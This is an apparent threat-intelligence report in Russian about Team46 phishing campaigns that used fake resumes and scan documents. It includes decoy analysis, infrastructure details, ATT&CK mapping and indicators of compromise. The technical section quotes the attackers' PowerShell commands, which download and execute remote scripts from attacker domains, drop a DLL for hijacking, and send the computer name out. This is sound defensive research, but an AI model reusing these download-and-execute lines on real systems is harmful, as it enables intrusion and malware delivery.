Атаки группировки Team46

ce23eeb1c7d51125d7c985b5dffbec03.jpg

Четвертого сентября исследователи из компании «Доктор Веб» выпустили интересный отчет о несостоявшейся атаке на российского оператора грузовых ж./д. перевозок.

Нам хотелось бы добавить в этот отчет наши находки и дополнительную информацию о других атаках. Мы назвали группу Team46, потому что в своей сетевой инфраструктуре атакующие использовали домен cybers46.team.

Первая атака

В конце февраля команда Threat Intelligence экспертного центра безопасности Positive Technologiesобнаружили письмо с темой Re: Фронтенд-разработчик. Оно было отправлено с адреса jobs@rabotnik.today и замаскировано под резюме фронтенд-разработчика.

f010ec284549ab5ed706c585f4c7ee9e.png

Сразу бросается в глаза написанный наугад номер телефона в подписи. К письму приложен запароленный архив Job Application_20240268.rar, который содержит файл Job Application.pdf.lnk, пароль от архива (Инна) указан в тексте письма. Кроме того, в письме есть ссылка rabotnik.today/resume/7952235986937661.rar, по которой скачивается архив уже без пароля, содержащий тот же самый ярлык. Из ярлыка запускается PowerShell-скрипт, который загружает другой PowerShell-скрипт по ссылке infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu (c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73), а тот скачивает документ-приманку по ссылке infosecteam.info/Job%20application.pdf и основную полезную нагрузку по ссылке infosecteam.info/base.php, которую нам не удалось получилось, но она была описана исследователями из компании «Доктор Веб».

Документ-приманка выглядит как резюме некой Клеблец Инны Федоровны.

8db53304e30f5a14a5bb587367f5e326.png

Резюме содержит несколько фактологических ошибок. Письмо было отправлено в конце февраля 2024 года, а дата рождения — 10 марта 1994 года, то есть должно быть показано 29 лет, а не 30. Кроме того, фамилии Клеблец не существует в принципе.

Изначально в резюме был указан почтовый адрес 8067282501@mail.ru, а после изменен на inna.kleblets@mail.ru. Все это, а также метаданные документа говорят о том, что файл был сохранен с сайта hh.ru и отредактирован в LibreOffice Writer 7.3 7 февраля 2024 в 02:00:00 UTC-05:00, при этом в качестве языка интерфейса LibreOffice Writer был использован en-US.

Отличительной особенностью этой атаки является то, что все используемые домены имеют заглушки, создающие вид его легитимности. Так, домен infosecteam.info принадлежит якобы российской компании InfoSecTeam.

2a55830cf065b09595cfa61251b520fe.png

Это может создавать видимость того, что файл является не реальной атакой, а пентестом. Страницы сайта явно имеют машинный перевод. Кроме того, в футере сайта есть ошибка в адресе, отсутствует указание дома.

ecab014b54e40757ccae4d57dd6fcacc.png

Шаблон сайта взят из магазина шаблонов для WordPress.

8622a6ea0117157aa431992e41a4b1de.png

Интересно, что при попытке поиска названия компании в Google первые две строки занимает сайт злоумышленников, а реальная компания из Великобритании, имеющая то же название, — лишь четвертую.

d335294dff1f902c23ba8923dff0b045.png

Аналогичная ситуация наблюдается и при поиске в Яндексе.

bf959a4cebbfabb65e7a7eac7203d4c6.png

Домен rabotnik.today также имеет заглушку.

5141a6867d1a0cf1f46f125dba4e3f6c.png

У сайта есть русскоязычная версия, которая также имеет машинный перевод.

973a634379362d35f00c058589561c9f.png

В атаке задействованы два домена — rabotnik.today и infosecteam.info, зарегистрированные 08.12.2023 и 19.02.2024 соответственно. Помимо этого, были найдены еще два домена — cybers46.team и cybers4646.my.id, которые были зарегистрированы 05.06.2023 и 03.06.2023 соответственно и так же резолвились в 162.0.236.151, как и infosecteam.info. Предположительно, они использовались для разработки атаки, что может говорить о том, что эта атака не первая. По домену cybers46.team мы назвали атакующую группу Team46.

Сама атака носила явно массовый характер: мы обнаружили почти 4000 одинаковых ярлыков (но с разными идентификаторами жертв) в архивах в открытых папках на infosecteam.info, загруженных туда в течение трех минут.

cb2db2467aa815e487cfaba7d95011fa.png

Подсказки при поиске в Яндексе тоже говорят о том, что люди часто сталкивались с описанным фейковым резюме.

af721e1d7ec67cc7aad62d75f108c74c.png

Вторая атака

В апреле экспертами PT Expert Security Center также были обнаружены аналогичные вредоносные ярлыки с именами SCAN_4024_2024_04_02.pdf.lnk и SCAN_4251_2024_03_25.pdf.lnk, загружавшие по ссылке srv480138.hstgr.cloud/uploads/scan_3824.pdf другой документ-приманку.

dec76fdc82c97a1e252aaac80d89dab2.png

Документ создан 26.02.2024 в 12:00:07 UTC+00:00 при помощи Microsoft: Print To PDF с именем Remote Desktop Redirected Printer Doc, что говорит о том, что злоумышленники получили доступ к документу по протоколу RDP, после чего вывели его на печать в формате PDF. Содержимое домена srv480138.hstgr.cloud являлось полной копией сайта elevation.store — бьюти-магазина в ОАЭ. Заглушка совершенно не соотносилась с документом-приманкой, но это может говорить о том, что этот сервер злоумышленники могли также использовать для атак в ОАЭ, но подтверждений не нашлось.

Технический анализ атак

В первой атаке ярлык запускает powershell.exe со следующей командой:

-w Minimized -ep Bypass -nop -c "irm https://infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | iex"

Каждому адресату отправляется ярлык с уникальным идентификатором. Ярлык скачивает и исполняет скрипт со следующим содержанием:

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -w Minimized -ep Bypass -nop -c "iwr 'http://infosecteam.info/Job%20application.pdf' -OutFile $env:LOCALAPPDATA\Temp\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.';$env:LOCALAPPDATA\Temp\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf; iwr 'http://infosecteam.info/base.php' -OutFile $env:LOCALAPPDATA\Yandex\YandexBrowser\Application\Wldp.dll -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.';"

Скрипт загружает документ-приманку и открывает его, а затем скачивает полезную нагрузку, которая использует технику DLL Hijacking, подменяя системную библиотеку wldp.dll для Яндекс Браузера. В скрипте в качестве User-Agent используется строка, относящаяся к браузеру Microsoft Edge версии 121, вышедшей 25 января 2024 года.

Ярлык из второй атаки запускает powershell.exe с аналогичной командой:

-w Minimized -ep Bypass -nop -c "irm https://srv480138.hstgr.cloud/warning.php?id=efu8crth52xe73hku1whp10h7i2unsnw | iex"

Идентификатор также уникален для каждой цели. Ярлык скачивает и исполняет скрипт:

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -w Minimized -ep Bypass -nop -c "iwr 'https://srv480138.hstgr.cloud/uploads/scan_3824.pdf' -OutFile $env:LOCALAPPDATA\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.';$env:LOCALAPPDATA\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf;iwr 'https://srv480138.hstgr.cloud/report.php?query=$env:COMPUTERNAME' -OutFile $env:LOCALAPPDATA\Temp\AdobeUpdater.exe -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.1 YaBrowser/23.11.0.0 Safari/537.36';$env:LOCALAPPDATA\Temp\AdobeUpdater.exe;"

В этом случае полезная нагрузка маскируется под обновление Adobe Reader. Здесь в качестве User-Agent используется строка, относящаяся уже к браузеру Microsoft Edge версии 120, вышедшей 7 декабря 2023 года, хотя эта атака была произведена позже. Все ярлыки созданы и изменены 15.11.2023 в 11:12:27 UTC. Но в первой атаке имя компьютера — desktop-420!69j, имя пользователя — Putin[REDACTED], а во второй имя компьютера — desktop-819jaxj, имя пользователя — IgornWay. Второе имя пользователя выглядит как замена букв в первом при сохранении регистра. Такие различия в метаданных и строке User-Agent могут говорить о том, что за атаками стоит не один человек, а группа людей.

Заключение

Для однозначной атрибуции злоумышленников, а также их истинных мотивов все еще не хватает дополнительного контекста. Однако, судя по уровню подготовки и организациям, которые были атакованы хакерами, можно сказать, что мы имеем дело с АРТ-группировкой.

Мы продолжаем отслеживать активность группировки Team46 и ждем от нее новых атак.

TTP группировки Team46 по матрице MITRE ATT&CK

ID

Имя

Описание

Reconnaissance

T1589.002

Gather Victim Identity Information: Email Addresses

Team46 рассылала таргетированные фишинговые письма по почтовым адресам из утечек

Resource Development

T1583.001

Acquire Infrastructure:  Domains

Team46 зарегистрировала несколько доменных имен для придания легитимного вида ссылкам через регистратора Namecheap

T1583.003

Acquire Infrastructure:  Virtual Private Server

Team46 приобрела VPS у сервиса Hostinger и использовала технический поддомен на hstgr.cloud

T1583.004

Acquire Infrastructure: Server

Team46 хостила серверы на сервисе Namecheap

T1585.002

Establish Accounts:  Email Accounts

Team46 использовала для придания легитимного вида письмам адрес jobs@rabotnik.today, созданный на одном из предварительно зарегистрированных доменов

T1608.005

Stage Capabilities: Link Target

Team46 использовала собственные серверы для размещения архивов с вредоносными ярлыками

Initial Access

T1566.001

Phishing: Spearphishing Attachment

Team46 рассылала таргетированные фишинговые электронные письма с вложенным RAR-архивом, защищенным паролем и содержавшим вредоносный ярлык, чтобы избежать обнаружения шлюзом электронной почты

T1566.002

Phishing:  Spearphishing Link

Team46 в таргетированных фишинговых письмах также использовала ссылки на RAR-архив без пароля, но содержавший тот же вредоносный ярлык

Execution

T1059.001

Command and Scripting Interpreter: PowerShell

Team46 использует PowerShell-скрипты для скачивания промежуточных стадий и основной нагрузки

T1204.001

User Execution: Malicious Link

Team46 пытается вынудить пользователей скачать архив с вредоносным ярлыком по ссылке, доставленной через фишинговое письмо

T1204.002

User Execution: Malicious File

Team46 пытается вынудить пользователей открыть вредоносный ярлык, доставленный через фишинговое вложение

Persistence

T1574.001

Hijack Execution Flow: DLL Search Order Hijacking

Для закрепления в системе Team46 использовала подмену wldp.dll в папке с Яндекс Браузером

Defense Evasion

T1574.001

Hijack Execution Flow: DLL Search Order Hijacking

Для выполнения полезной нагрузки Team46 использовала подмену wldp.dll в папке с Яндекс Браузером, что позволило обойти песочницу

IOCs

Файловые индикаторы

Имя файла

MD5

SHA1

SHA256

Job Application_20240268.rar

8fedb5dae41ad563f2276b90930aa341

a35a21776eb16ed904ba09dd76a5f6dddd7aee98

c801243a2e14b64ed1d87feef9ce6298d90d72eb2bbff3994d868424c2a2346c

Job Application.pdf.lnk

c0df1e743bcc016245de4731fb7220b9

e59284d6677ede89d525491956258d29cd83c59f

823d625481fe8b0299850e9758e43b717b6874d42e0112f1b8281bcefedadd31

7952235986937661.rar

be930ec5fe56fce7abca7df85cb8fecb

61b99ca03d7f2d19279e53a9e53b31eec49f5bc0

c101e1f8b4bb6b498ab99a4cf7fd9e62a4126be16409effa379c4f78194b5707

ps1

760550ef574cc8f660314a3bf7c21a9d

dca725b40e8f5ba28cd78d285c0e6c77f6b96996

c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73

scan_3824.pdf

92c0e50193bfc15d29128d41e689625b

e4592319b8c7ed0c6859eac490f52a428b26410b

62248642faaf84400a23b14c50fdf2ea37ece82262fd344963fbd57bd49973c7

Job application.pdf

9ab5785378bf723844a0eea7f42a5084

d77657f52745b3b9331dd55a431a59ac135cac64

e92ad395f945596ff4e1afaf852119046f663285e4a79792c4db2cf97a2a8f61

Сетевые индикаторы

rabotnik.today

infosecteam.info

cybers46.team

cybers4646.my.id

srv480138.hstgr.cloud

162.0.236.151

203.161.60.229

149.100.138.167

Станислав Пыжов

Старший специалист группы исследования сложных угроз экспертного центра безопасности Positive Technologies

Денис Кувшинов

Руководитель департамента Threat Intelligence экспертного центра безопасности Positive Technologies

© Habrahabr.ru